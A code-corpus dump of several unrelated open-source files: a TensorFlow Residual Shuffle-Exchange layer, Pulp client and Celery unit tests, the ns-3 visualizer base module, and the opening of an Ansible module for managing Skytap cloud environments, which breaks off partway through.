self.init_value = inv_sigmoid(residual_weight)
def build(self, input_shape):
"""Initialize layer weights and sublayers.
Args:
input_shape: shape of inputs
"""
in_units = input_shape[-1]
middle_units = in_units * 4
out_units = in_units * 2
init = tf.variance_scaling_initializer(
scale=1.0, mode="fan_avg", distribution="uniform")
self.first_linear = tf.keras.layers.Dense(
middle_units,
use_bias=False,
kernel_initializer=init,
name=self.prefix + "/cand1")
self.second_linear = tf.keras.layers.Dense(
out_units, kernel_initializer=init, name=self.prefix + "/cand2")
self.layer_norm = LayerNormalization()
init = tf.constant_initializer(self.init_value)
self.residual_scale = self.add_weight(
self.prefix + "/residual", [out_units], initializer=init)
super(RSU, self).build(input_shape)
def call(self, inputs, **kwargs):
"""Apply Residual Switch Layer to inputs.
Args:
inputs: Input tensor.
**kwargs: unused kwargs.
Returns:
tf.Tensor: New candidate value
"""
del kwargs
input_shape = tf.shape(inputs)
batch_size = input_shape[0]
length = input_shape[1]
num_units = inputs.shape.as_list()[2]
n_bits = tf.log(tf.cast(length - 1, tf.float32)) / tf.log(2.0)
n_bits = tf.floor(n_bits) + 1
reshape_shape = [batch_size, length // 2, num_units * 2]
reshaped_inputs = tf.reshape(inputs, reshape_shape)
first_linear = self.first_linear(reshaped_inputs)
first_linear = self.layer_norm(first_linear)
first_linear = gelu(first_linear)
candidate = self.second_linear(first_linear)
residual = tf.sigmoid(self.residual_scale) * reshaped_inputs
candidate = residual + candidate * self.candidate_weight
candidate = tf.reshape(candidate, input_shape)
if self.dropout > 0:
candidate = tf.nn.dropout(candidate, rate=self.dropout / n_bits)
if self.dropout != 0.0 and self.mode == tf.estimator.ModeKeys.TRAIN:
noise = tf.random_normal(tf.shape(candidate), mean=1.0, stddev=0.001)
candidate = candidate * noise
return candidate
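# Shape walkthrough for RSU.call (added comment): inputs of shape
# [batch, length, units] are viewed as [batch, length // 2, 2 * units] so that each
# switch unit mixes adjacent position pairs; each pair passes through a
# layer-normalized 4 * units GELU layer, is projected back to 2 * units, blended
# with the sigmoid-gated residual, and finally reshaped back to [batch, length, units].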
def residual_shuffle_network(inputs, hparams):
"""Residual Shuffle-Exchange network with weight sharing.
Args:
inputs: inputs to the Shuffle-Exchange network. Should be in length of power
of 2.
hparams: Model configuration
Returns:
tf.Tensor: Outputs of the Shuffle-Exchange last layer
"""
input_shape = tf.shape(inputs)
n_bits = tf.log(tf.cast(input_shape[1] - 1, tf.float32)) / tf.log(2.0)
n_bits = tf.cast(n_bits, tf.int32) + 1
block_out = inputs
for k in range(hparams.num_hidden_layers):
with tf.variable_scope("benes_block_" + str(k), reuse=tf.AUTO_REUSE):
forward_output = forward_part(block_out, hparams, n_bits)
block_out = reverse_part(forward_output, hparams, n_bits)
return RSU("last_layer", hparams.dropout, hparams.mode)(block_out)
def reverse_part(inputs, hparams, n_bits):
"""Reverse part of Benes block.
  Repeatedly applies interleaved Residual Switch layer and Reverse Shuffle
Layer. One set of weights used for all Switch layers.
Args:
inputs: inputs for reverse part. Should be outputs from forward part.
hparams: params of the network.
n_bits: count of repeated layer applications.
Returns:
tf.Tensor: output of reverse part.
"""
reverse_rsu = RSU("reverse_switch", hparams.dropout, hparams.mode)
def reverse_step(state, _):
with tf.variable_scope("reverse"):
new_state = reverse_rsu(state)
return reverse_shuffle_layer(new_state)
reverse_outputs = tf.scan(
reverse_step,
tf.range(n_bits, n_bits * 2),
initializer=inputs,
parallel_iterations=1,
swap_memory=True)
return reverse_outputs[-1, :, :, :]
def forward_part(block_out, hparams, n_bits):
"""Forward part of Benes block.
  Repeatedly applies interleaved Residual Switch layer and Shuffle
Layer. One set of weights used for all Switch layers.
Args:
block_out: TODO(authors) document.
hparams: params of the network.
n_bits: count of repeated layer applications.
Returns:
tf.Tensor: output of forward part.
"""
forward_rsu = RSU("switch", hparams.dropout, hparams.mode)
def forward_step(state, _):
with tf.variable_scope("forward"):
new_state = forward_rsu(state)
return shuffle_layer(new_state)
forward_outputs = tf.scan(
forward_step,
tf.range(0, n_bits),
initializer=block_out,
parallel_iterations=1,
swap_memory=True)
return forward_outputs[-1, :, :, :]
@registry.register_model
class ResidualShuffleExchange(ShuffleNetwork):
"""T2T implementation of Residual Shuffle-Exchange network."""
def body(self, features):
"""Body of Residual Shuffle-Exchange network.
Args:
features: dictionary of inputs and targets
Returns:
the network output.
"""
inputs = tf.squeeze(features["inputs"], axis=2)
logits = residual_shuffle_network(inputs, self._hparams)
return tf.expand_dims(logits, axis=2)
| apache-2.0 |
nthien/pulp | client_lib/test/unit/client/commands/repo/test_sync_publish.py | 7 | 23765 | """
Testing this stuff is a nightmare. To ease the pain, these tests only cover the
commands themselves and ensure they call into the status rendering module. The
status module itself will be tested apart from what happens in the commands.
"""
import copy
import unittest
import mock
from pulp.bindings import responses
from pulp.client.commands import options, polling
from pulp.client.commands.repo import sync_publish as sp
from pulp.client.extensions.core import TAG_TITLE
from pulp.client.extensions.extensions import PulpCliOption
from pulp.common import tags
from pulp.devel.unit import base
CALL_REPORT_TEMPLATE = {
"exception": None,
"task_id": 'default-id',
"tags": ['pulp:action:sync'],
"start_time": None,
"traceback": None,
"state": None,
"finish_time": None,
"schedule_id": None,
"result": None,
"progress_report": {},
}
class GetRepoTasksTests(unittest.TestCase):
"""
Tests for the _get_repo_tasks() function.
"""
def test_publish_action(self):
"""
Test with action set to 'publish'.
"""
context = mock.MagicMock()
a_task = mock.MagicMock()
context.server.tasks_search.search.return_value = [a_task]
repo_id = 'some_repo'
action = 'publish'
tasks = sp._get_repo_tasks(context, repo_id, action)
self.assertEqual(tasks, [a_task])
expected_repo_tag = tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id)
expected_action_tag = tags.action_tag(tags.ACTION_PUBLISH_TYPE)
expected_search_criteria = {
'filters': {'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [expected_repo_tag, expected_action_tag]}}}
context.server.tasks_search.search.assert_called_once_with(**expected_search_criteria)
def test_sync_action(self):
"""
Test with action set to 'sync'.
"""
context = mock.MagicMock()
a_task = mock.MagicMock()
context.server.tasks_search.search.return_value = [a_task]
repo_id = 'some_repo'
action = 'sync'
tasks = sp._get_repo_tasks(context, repo_id, action)
self.assertEqual(tasks, [a_task])
expected_repo_tag = tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id)
expected_action_tag = tags.action_tag(tags.ACTION_SYNC_TYPE)
expected_search_criteria = {
'filters': {'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [expected_repo_tag, expected_action_tag]}}}
context.server.tasks_search.search.assert_called_once_with(**expected_search_criteria)
def test_unsupported_action(self):
"""
Test with action set to neither sync or publish.
"""
context = mock.MagicMock()
a_task = mock.MagicMock()
context.server.tasks_search.search.return_value = [a_task]
repo_id = 'some_repo'
action = 'unsupported'
self.assertRaises(ValueError, sp._get_repo_tasks, context, repo_id, action)
class SyncPublishCommandTests(base.PulpClientTests):
"""
Tests for the SyncPublishCommand class.
"""
@mock.patch('pulp.client.commands.polling.PollingCommand.__init__',
side_effect=polling.PollingCommand.__init__, autospec=True)
def test__init___method_set(self, __init__):
"""
Test the __init__() method when method is set.
"""
name = 'some_name'
description = 'some_description'
method = mock.MagicMock()
context = mock.MagicMock()
renderer = mock.MagicMock()
spc = sp.SyncPublishCommand(name, description, method, context, renderer)
self.assertEqual(spc.renderer, renderer)
self.assertEqual(spc.context, context)
self.assertEqual(spc.prompt, context.prompt)
self.assertTrue(options.OPTION_REPO_ID in spc.options)
__init__.assert_called_once_with(spc, name, description, method, context)
@mock.patch('pulp.client.commands.polling.PollingCommand.__init__',
side_effect=polling.PollingCommand.__init__, autospec=True)
def test__init___method_unset(self, __init__):
"""
Test the __init__() method when method is None.
"""
name = 'some_name'
description = 'some_description'
method = None
context = mock.MagicMock()
renderer = mock.MagicMock()
# Because the SyncPublishCommand does not have a run() method, we need to make and test a
        # subclass of it that has a run() method to ensure that method defaults to run() when it is
# None.
class TestSubclass(sp.SyncPublishCommand):
def run(self):
pass
spc = TestSubclass(name, description, method, context, renderer)
self.assertEqual(spc.renderer, renderer)
self.assertEqual(spc.context, context)
self.assertEqual(spc.prompt, context.prompt)
self.assertTrue(options.OPTION_REPO_ID in spc.options)
# When method is None, self.run should have been used instead
__init__.assert_called_once_with(spc, name, description, spc.run, context)
class RunSyncRepositoryCommandTests(base.PulpClientTests):
"""
Test the RunSyncRepositoryCommand class.
"""
def setUp(self):
super(RunSyncRepositoryCommandTests, self).setUp()
self.mock_renderer = mock.MagicMock()
self.command = sp.RunSyncRepositoryCommand(self.context, self.mock_renderer)
def test_progress(self):
"""
Test the progress() method with a progress_report.
"""
progress_report = {'some': 'data'}
task = responses.Task({'progress_report': progress_report})
spinner = mock.MagicMock()
self.command.progress(task, spinner)
self.mock_renderer.display_report.assert_called_once_with(progress_report)
def test_progress_no_progress(self):
"""
Test the progress() method when the Task does not have any progress_report.
"""
task = responses.Task({})
spinner = mock.MagicMock()
self.command.progress(task, spinner)
self.assertEqual(self.mock_renderer.display_report.call_count, 0)
def test_progress_failed_task(self):
"""
Test the progress() method when the Task failed. In this case, the
error will be rendered by the generic failure handler.
"""
progress_report = {'some': 'data'}
task = responses.Task({'progress_report': progress_report})
task.state = responses.STATE_ERROR
spinner = mock.MagicMock()
self.command.progress(task, spinner)
self.assertEqual(self.mock_renderer.display_report.call_count, 0)
def test_structure(self):
# Ensure all of the expected options are there
found_option_keywords = set([o.keyword for o in self.command.options])
expected_option_keywords = set([options.OPTION_REPO_ID.keyword,
polling.FLAG_BACKGROUND.keyword])
self.assertEqual(found_option_keywords, expected_option_keywords)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'run')
self.assertEqual(self.command.description, sp.DESC_SYNC_RUN)
@mock.patch('pulp.client.commands.repo.sync_publish.RunSyncRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.sync')
def test_run(self, mock_sync, mock_search, poll):
"""
Test the run() method when there is not an existing sync Task on the server.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# No tasks are running
mock_search.return_value = []
# responses.Response from the sync call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_sync.return_value = responses.Response(202, task)
self.command.run(**data)
mock_sync.assert_called_once_with(repo_id, None)
sync_tasks = poll.mock_calls[0][1][0]
poll.assert_called_once_with(sync_tasks, data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
self.assertEqual(self.prompt.get_write_tags(), [TAG_TITLE])
@mock.patch('pulp.client.commands.repo.sync_publish.RunSyncRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.sync')
def test_run_already_in_progress(self, mock_sync, mock_search, poll):
"""
Test the run() method when there is an existing sync Task on the server.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# Simulate a task already running
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
self.assertEqual(mock_sync.call_count, 0)
sync_tasks = poll.mock_calls[0][1][0]
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
poll.assert_called_once_with(sync_tasks, data)
write_tags = self.prompt.get_write_tags()
self.assertEqual(2, len(write_tags))
self.assertEqual(write_tags[1], 'in-progress')
@mock.patch('pulp.client.commands.repo.sync_publish.RunSyncRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.sync')
def test_run_background(self, mock_sync, mock_search, mock_poll):
"""
Test the run() method when the --bg flag is set.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: True}
# No tasks are running
mock_search.return_value = []
# responses.Response from the sync call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_sync.return_value = responses.Response(202, task)
self.command.run(**data)
mock_sync.assert_called_once_with(repo_id, None)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
def test_task_header(self):
"""
The task_header() method only passes to avoid the superclass's behavior, so this test just
gets us to 100% coverage.
"""
self.command.task_header(mock.MagicMock())
class SyncStatusCommand(base.PulpClientTests):
def setUp(self):
super(SyncStatusCommand, self).setUp()
self.renderer = mock.MagicMock()
self.command = sp.SyncStatusCommand(self.context, self.renderer)
def test_structure(self):
# Ensure all of the expected options are there
found_options = set(self.command.options)
expected_options = set([options.OPTION_REPO_ID, polling.FLAG_BACKGROUND])
self.assertEqual(found_options, expected_options)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'status')
self.assertEqual(self.command.description, sp.DESC_SYNC_STATUS)
@mock.patch('pulp.client.commands.repo.sync_publish.SyncStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run(self, mock_search, poll):
"""
Test the run() method when the server has one incomplete sync task.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
sync_tasks = poll.mock_calls[0][1][0]
poll.assert_called_once_with(sync_tasks, data)
@mock.patch('pulp.client.commands.repo.sync_publish.PublishStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run_no_status(self, mock_search, mock_poll):
"""
Test run() when there are no sync_tasks on the server.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
# No tasks are running
mock_search.return_value = []
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_SYNC_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
self.assertEqual(0, mock_poll.call_count)
self.assertEqual(self.prompt.get_write_tags(), [TAG_TITLE, 'no-tasks'])
class StatusRendererTests(unittest.TestCase):
def test_default_display_report(self):
# Setup
mock_context = mock.MagicMock()
mock_prompt = mock.MagicMock()
mock_context.prompt = mock_prompt
# Test
sr = sp.StatusRenderer(mock_context)
self.assertRaises(NotImplementedError, sr.display_report, None)
# Verify
self.assertTrue(sr.context is mock_context)
self.assertTrue(sr.prompt is mock_prompt)
class RunPublishRepositoryCommandTests(base.PulpClientTests):
def setUp(self):
super(RunPublishRepositoryCommandTests, self).setUp()
self.mock_renderer = mock.MagicMock()
self.command = sp.RunPublishRepositoryCommand(self.context, self.mock_renderer,
distributor_id='yum_distributor')
self.sample_option1 = PulpCliOption('--sample-option1', "sample_option1", required=False)
self.sample_option2 = PulpCliOption('--sample-option2', "sample_option2", required=False)
self.additional_publish_options = [self.sample_option1, self.sample_option2]
def test_structure(self):
# Ensure all of the expected options are there
self.command = sp.RunPublishRepositoryCommand(
self.context, self.mock_renderer, distributor_id='yum_distributor',
override_config_options=self.additional_publish_options)
found_option_keywords = set([o.keyword for o in self.command.options])
found_group_option_keywords = set(
[o.keyword for o in self.command.option_groups[0].options])
expected_option_keywords = set([options.OPTION_REPO_ID.keyword,
polling.FLAG_BACKGROUND.keyword])
expected_group_option_keywords = set([self.sample_option1.keyword,
self.sample_option2.keyword])
self.assertEqual(found_option_keywords, expected_option_keywords)
self.assertEqual(found_group_option_keywords, expected_group_option_keywords)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'run')
self.assertEqual(self.command.description, sp.DESC_PUBLISH_RUN)
@mock.patch('pulp.client.commands.repo.sync_publish.RunPublishRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.publish')
def test_run(self, mock_publish, mock_search, mock_poll):
"""
Test the run() method when there are no incomplete publish tasks in queue.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# No tasks are running
mock_search.return_value = []
        # responses.Response from the publish call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_publish.return_value = responses.Response(202, task)
self.command.run(**data)
mock_publish.assert_called_once_with(repo_id, self.command.distributor_id, None)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
@mock.patch('pulp.client.commands.repo.sync_publish.RunPublishRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.publish')
def test_run_already_in_progress(self, mock_publish, mock_search, mock_poll):
"""
        Test the run() method when there is already an incomplete publish operation.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: False}
# Simulate a task already running
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
# Publish shouldn't get called again since it's already running
self.assertEqual(mock_publish.call_count, 0)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
write_tags = self.prompt.get_write_tags()
self.assertEqual(2, len(write_tags))
self.assertEqual(write_tags[1], 'in-progress')
@mock.patch('pulp.client.commands.repo.sync_publish.RunPublishRepositoryCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
@mock.patch('pulp.bindings.repository.RepositoryActionsAPI.publish')
def test_run_background(self, mock_publish, mock_search, mock_poll):
"""
        Test the run() method when the --bg flag is set.
"""
repo_id = 'test-repo'
        data = {options.OPTION_REPO_ID.keyword: repo_id, polling.FLAG_BACKGROUND.keyword: True}
# No tasks are running
mock_search.return_value = []
        # responses.Response from the publish call
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task = responses.Task(task_data)
mock_publish.return_value = responses.Response(202, task)
self.command.run(**data)
mock_publish.assert_called_once_with(repo_id, self.command.distributor_id, None)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
class PublishStatusCommand(base.PulpClientTests):
def setUp(self):
super(PublishStatusCommand, self).setUp()
self.renderer = mock.MagicMock()
self.command = sp.PublishStatusCommand(self.context, self.renderer)
def test_structure(self):
# Ensure all of the expected options are there
found_options = set(self.command.options)
expected_options = set([options.OPTION_REPO_ID, polling.FLAG_BACKGROUND])
self.assertEqual(found_options, expected_options)
# Ensure the correct method is wired up
self.assertEqual(self.command.method, self.command.run)
# Ensure the correct metadata
self.assertEqual(self.command.name, 'status')
self.assertEqual(self.command.description, sp.DESC_PUBLISH_STATUS)
@mock.patch('pulp.client.commands.repo.sync_publish.PublishStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run(self, mock_search, mock_poll):
"""
Test the run() method when there is one publish Task. It should call poll() on it.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
# Simulate a task already running
task_data = copy.copy(CALL_REPORT_TEMPLATE)
task_data['state'] = 'running'
task = responses.Task(task_data)
mock_search.return_value = [task]
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
mock_poll.assert_called_once_with([task], data)
@mock.patch('pulp.client.commands.repo.sync_publish.PublishStatusCommand.poll')
@mock.patch('pulp.bindings.tasks.TaskSearchAPI.search')
def test_run_no_status(self, mock_search, mock_poll):
"""
Test the run() method when there are no current publish Tasks to attach to. It
should query the server and inform the user that there are no publish operations to
report.
"""
repo_id = 'test-repo'
data = {options.OPTION_REPO_ID.keyword: repo_id}
# Simulate there being no publish tasks
mock_search.return_value = []
self.command.run(**data)
expected_search_query = {
'state': {'$nin': responses.COMPLETED_STATES},
'tags': {'$all': [tags.resource_tag(tags.RESOURCE_REPOSITORY_TYPE, repo_id),
tags.action_tag(tags.ACTION_PUBLISH_TYPE)]}}
mock_search.assert_called_once_with(filters=expected_search_query)
self.assertEqual(0, mock_poll.call_count)
self.assertEqual(self.prompt.get_write_tags(), [TAG_TITLE, 'no-tasks'])
| gpl-2.0 |
moijes12/oh-mainline | vendor/packages/celery/celery/tests/test_app/test_app_defaults.py | 19 | 1060 | from __future__ import absolute_import
from __future__ import with_statement
import sys
from importlib import import_module
from celery.tests.utils import unittest, pypy_version, sys_platform
class test_defaults(unittest.TestCase):
def setUp(self):
self._prev = sys.modules.pop("celery.app.defaults", None)
def tearDown(self):
if self._prev:
sys.modules["celery.app.defaults"] = self._prev
def test_default_pool_pypy_14(self):
with sys_platform("darwin"):
with pypy_version((1, 4, 0)):
self.assertEqual(self.defaults.DEFAULT_POOL, "solo")
def test_default_pool_pypy_15(self):
with sys_platform("darwin"):
with pypy_version((1, 5, 0)):
self.assertEqual(self.defaults.DEFAULT_POOL, "processes")
def test_default_pool_jython(self):
with sys_platform("java 1.6.51"):
self.assertEqual(self.defaults.DEFAULT_POOL, "threads")
@property
def defaults(self):
return import_module("celery.app.defaults")
| agpl-3.0 |
nyuwireless/ns3-mmwave | src/visualizer/visualizer/base.py | 160 | 3799 | import ns.point_to_point
import ns.csma
import ns.wifi
import ns.bridge
import ns.internet
import ns.mesh
import ns.wimax
import ns.lte
import gobject
import os.path
import sys
PIXELS_PER_METER = 3.0 # pixels-per-meter, at 100% zoom level
class PyVizObject(gobject.GObject):
__gtype_name__ = "PyVizObject"
def tooltip_query(self, tooltip):
tooltip.set_text("TODO: tooltip for %r" % self)
class Link(PyVizObject):
pass
class InformationWindow(object):
def update(self):
raise NotImplementedError
class NetDeviceTraits(object):
def __init__(self, is_wireless=None, is_virtual=False):
assert is_virtual or is_wireless is not None
self.is_wireless = is_wireless
self.is_virtual = is_virtual
netdevice_traits = {
ns.point_to_point.PointToPointNetDevice: NetDeviceTraits(is_wireless=False),
ns.csma.CsmaNetDevice: NetDeviceTraits(is_wireless=False),
ns.wifi.WifiNetDevice: NetDeviceTraits(is_wireless=True),
ns.bridge.BridgeNetDevice: NetDeviceTraits(is_virtual=True),
ns.internet.LoopbackNetDevice: NetDeviceTraits(is_virtual=True, is_wireless=False),
ns.mesh.MeshPointDevice: NetDeviceTraits(is_virtual=True),
ns.wimax.SubscriberStationNetDevice: NetDeviceTraits(is_wireless=True),
ns.wimax.BaseStationNetDevice: NetDeviceTraits(is_wireless=True),
ns.lte.LteUeNetDevice: NetDeviceTraits(is_wireless=True),
ns.lte.LteEnbNetDevice: NetDeviceTraits(is_wireless=True),
}
def lookup_netdevice_traits(class_type):
try:
return netdevice_traits[class_type]
except KeyError:
sys.stderr.write("WARNING: no NetDeviceTraits registered for device type %r; "
"I will assume this is a non-virtual wireless device, "
"but you should edit %r, variable 'netdevice_traits',"
" to make sure.\n" % (class_type.__name__, __file__))
t = NetDeviceTraits(is_virtual=False, is_wireless=True)
netdevice_traits[class_type] = t
return t
def transform_distance_simulation_to_canvas(d):
return d*PIXELS_PER_METER
def transform_point_simulation_to_canvas(x, y):
return x*PIXELS_PER_METER, y*PIXELS_PER_METER
def transform_distance_canvas_to_simulation(d):
return d/PIXELS_PER_METER
def transform_point_canvas_to_simulation(x, y):
return x/PIXELS_PER_METER, y/PIXELS_PER_METER
plugins = []
plugin_modules = {}
def register_plugin(plugin_init_func, plugin_name=None, plugin_module=None):
"""
Register a plugin.
    @param plugin_init_func: a callable object that will be invoked whenever a
    Visualizer object is created, like this: plugin_init_func(visualizer)
"""
assert callable(plugin_init_func)
plugins.append(plugin_init_func)
if plugin_module is not None:
plugin_modules[plugin_name] = plugin_module
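# Illustrative sketch (added comment; hypothetical file): a plugin dropped into the
# visualizer/plugins/ directory only needs a module-level register() function;
# load_plugins() below imports it, hands it to register_plugin(), and it is then
# called once per Visualizer instance as register(visualizer).
#
#   # plugins/my_plugin.py
#   def register(viz):
#       pass  # hook per-visualizer setup here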
plugins_loaded = False
def load_plugins():
global plugins_loaded
if plugins_loaded:
return
plugins_loaded = True
plugins_dir = os.path.join(os.path.dirname(__file__), 'plugins')
old_path = list(sys.path)
sys.path.insert(0, plugins_dir)
for filename in os.listdir(plugins_dir):
name, ext = os.path.splitext(filename)
if ext != '.py':
continue
try:
plugin_module = __import__(name)
except ImportError, ex:
print >> sys.stderr, "Could not load plugin %r: %s" % (filename, str(ex))
continue
try:
plugin_func = plugin_module.register
except AttributeError:
print >> sys.stderr, "Plugin %r has no 'register' function" % name
else:
#print >> sys.stderr, "Plugin %r registered" % name
register_plugin(plugin_func, name, plugin_module)
sys.path = old_path
| gpl-2.0 |
benc-uk/skytap-ansible | library/skytap_environment.py | 1 | 5233 | #!/usr/bin/python
# Copyright (c) 2016 Ben Coleman
# Software provided under the terms of the Apache 2.0 license http://www.apache.org/licenses/LICENSE-2.0.txt
DOCUMENTATION = '''
---
module: skytap_environment
short_description: Build and control Skytap cloud environments
'''
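# Illustrative EXAMPLES block (added; hypothetical values -- the parameters mirror the
# argument_spec defined in main() below).
EXAMPLES = '''
- name: Create an environment from a template
  skytap_environment:
    username: "{{ skytap_user }}"
    token: "{{ skytap_token }}"
    action: create
    template_id: "123456"
    name: "demo-env"

- name: Suspend an existing environment
  skytap_environment:
    username: "{{ skytap_user }}"
    token: "{{ skytap_token }}"
    action: modify
    environment_id: "{{ env_id }}"
    state: suspended
'''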
import json
import requests
import sys
import time
from ansible.module_utils.basic import AnsibleModule
# API endpoint for Skytap REST API
API_BASE = 'https://cloud.skytap.com/'
API_HEADERS = {'accept': 'application/json', 'content-type': 'application/json'}
# Basic REST call to Skytap API
def restCall(auth, method, path, data=None):
try:
if(method == 'GET'):
result = requests.get(API_BASE + path, headers=API_HEADERS, auth=auth)
if(method == 'POST'):
result = requests.post(API_BASE + path, headers=API_HEADERS, auth=auth, data=data)
if(method == 'PUT'):
result = requests.put(API_BASE + path, headers=API_HEADERS, auth=auth, data=data)
if(method == 'DELETE'):
result = requests.delete(API_BASE + path, headers=API_HEADERS, auth=auth, allow_redirects=True)
if len(result.content) > 0:
return result.status_code, result.json()
else:
return result.status_code, None
except:
return -1, None
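# Illustrative call (added comment; hypothetical credentials): list up to 10 of the
# caller's environments via the v2 API. Each returned entry describes one environment.
#   status, body = restCall(('user@example.com', 'api-token'), 'GET',
#                           '/v2/configurations?scope=me&count=10')
#   if status == 200:
#       pass  # body holds the decoded JSON list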
# Main module code here
def main():
module = AnsibleModule(
argument_spec = dict(
username = dict(required=True),
token = dict(required=True),
action = dict(default='create', choices=['create', 'modify', 'delete', 'read', 'list', 'wait_ratelimit', 'copy']),
template_id = dict(required=False),
environment_id = dict(required=False),
name = dict(required=False),
state = dict(required=False, choices=['running', 'stopped', 'suspended', 'halted', 'reset'])
),
supports_check_mode=False
)
auth = (module.params.get('username'), module.params.get('token'))
if module.params.get('action') == 'create':
if not module.params.get('template_id'):
module.fail_json(msg="template_id is required param when action=create")
request_data = {"template_id": module.params.get('template_id')}
if module.params.get('name'):
request_data['name'] = module.params.get('name')
status, result = restCall(auth, 'POST', '/v1/configurations', data=json.dumps(request_data))
if module.params.get('action') == 'modify':
request_data = {}
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=modify")
if module.params.get('state'):
request_data['runstate'] = module.params.get('state')
if module.params.get('name'):
request_data['name'] = module.params.get('name')
status, result = restCall(auth, 'PUT', '/v1/configurations/'+str(module.params.get('environment_id')), data=json.dumps(request_data))
if module.params.get('action') == 'delete':
if not module.params.get('environment_id'):
module.fail_json(msg="environment_id is required param when action=delete")
